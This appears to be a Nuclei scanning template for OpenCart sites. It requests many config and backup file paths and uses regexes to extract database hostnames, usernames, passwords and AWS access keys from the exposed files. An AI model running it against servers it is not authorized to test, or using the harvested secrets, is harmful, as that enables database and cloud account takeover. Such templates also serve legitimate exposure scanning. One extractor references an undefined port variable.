id: CFG-opencart
info:
  name: Opencart accessible config
  author: 0xAI
  severity: high
  tags: backups
  metadata:
    verified: true
  #===VULN-PART===#
http: 
  - method: GET
    path:
      - '{{BaseURL}}/system/config/default.php' # opencart               
      - '{{BaseURL}}/config.inc'      
      - '{{BaseURL}}/.config.php.swp'
      - '{{BaseURL}}/config.php_'
      - '{{BaseURL}}/config.old'
      - '{{BaseURL}}/config.php.txt'
      - '{{BaseURL}}/config.php.bak'
      - '{{BaseURL}}/config.php.old'
      - '{{BaseURL}}/config.php.dist'
      - '{{BaseURL}}/config.php.inc'
      - '{{BaseURL}}/config.php.swp'
      - '{{BaseURL}}/config.php.html'
      - '{{BaseURL}}/config-backup.txt'
      - '{{BaseURL}}/config.php.save'
      - '{{BaseURL}}/config.php~'
      - '{{BaseURL}}/config.php.orig'
      - '{{BaseURL}}/config.php.original'
      - '{{BaseURL}}/config.json'
      - '{{BaseURL}}/config.php.zip'
      - '{{BaseURL}}/config.php.tar.gz'
      - '{{BaseURL}}/config.php.new'
      - '{{BaseURL}}/common/config.php.new'
      - '{{BaseURL}}/config.txt'  
      - '{{BaseURL}}/config.php'          
      
    stop-at-first-match: true

    matchers-condition: and    
    matchers:
      - type: word
        part: body
        words:
          - "'DB_PASSWORD'"
          - "'DBPASS'"
          - "define('DB"
          - 'define('          
          - "host:"
          - "pass:"   
          - DB_HOSTNAME
          - "db_name"
          - "db_pwd"
          - "db_host"                        
        condition: or

      - type: word
        part: body
        words:        
         - "DIR_APPLICATION"

      - type: status
        status:
          - 200
          - 205
        condition: or  
        
  #===EXTRACT-PART===#

    extractors:
      - type: regex
        part: body
        name: db_host        
        group: 6
        internal: true
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB|DATABASE)_(HOST|HOSTNAME)['\"](.*?).*?['\"](.*?)['\"]"
#      - type: regex
#        part: body
#        name: db_name        
#        group: 6
#        internal: true        
#        regex:
#          - "define\\((.*?)['\"](.*?)(MYSQL|DB|DATABASE)_(NAME|DATABASE)['\"](.*?).*?['\"](.*?)['\"]"          
      - type: regex
        part: body
        name: db_user        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB|DATABASE)_(USER|USERNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_password        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB|DATABASE)_(PASS|PASSWORD)['\"](.*?).*?['\"](.*?)['\"]"

      - type: regex
        part: body
        name: aws_key
        regex:
          - "((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"

      - type: regex
        part: body
        name: aws_key1
        regex:
          - (?i)(['\"]access-key-id['\"]\\s*=>\\s*['\"](AKIA[0-9A-Z]{16})['\"]|['\"]secret-access-key['\"]\\s*=>\\s*['\"]([A-Za-z0-9\/+]{40})['\"])

      - type: dsl  # type of the extractor
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + "3306" + "|DB_USERNAME=" + db_user + "|DB_PASSWORD=" + db_password'
          
      - type: dsl
        name: db_original
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USER=" +  db_user + "|DB_PASSWORD=" + db_password' 